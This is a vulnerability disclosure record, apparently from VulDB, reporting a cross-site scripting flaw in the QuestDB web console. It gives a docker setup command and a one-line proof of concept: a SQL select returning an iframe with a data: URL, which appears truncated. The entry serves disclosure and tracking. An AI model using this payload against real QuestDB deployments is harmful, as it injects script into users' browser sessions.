| Title | questdb V9.2.3(latest) xss |
|---|
| Description | Vulnerability Title
There is a cross-site scripting(XSS) vulnerability in the QuestDB database
Affected Versions:
V9.2.3(latest)
Discovery Time:
2026-01-05
Discoverer:
59LAB([email protected])
Analysis Report:
installed: docker run -p 9000:9000 -p 9009:9009 -p 8812:8812 questdb/questdb image
POC
http://192.168.150.33:9000/index.html POC: select '<iframe src="data:text/html,"></iframe>' image image |
|---|
| Source | ⚠️ https://github.com/59lab/dbdb/blob/main/There%20is%20a%20cross-site%20scripting(XSS)%20vulnerability%20in%20the%20QuestDB%20database.md |
|---|
| User | 59lab (UID 94191) |
|---|
| Submission | 01/07/2026 03:27 (3 months ago) |
|---|
| Moderation | 01/09/2026 19:34 (3 days later) |
|---|
| Status | Accepted |
|---|
| VulDB entry | 340357 [questdb ui up to 1.11.9 Web Console cross site scripting] |
|---|
| Points | 20 |
|---|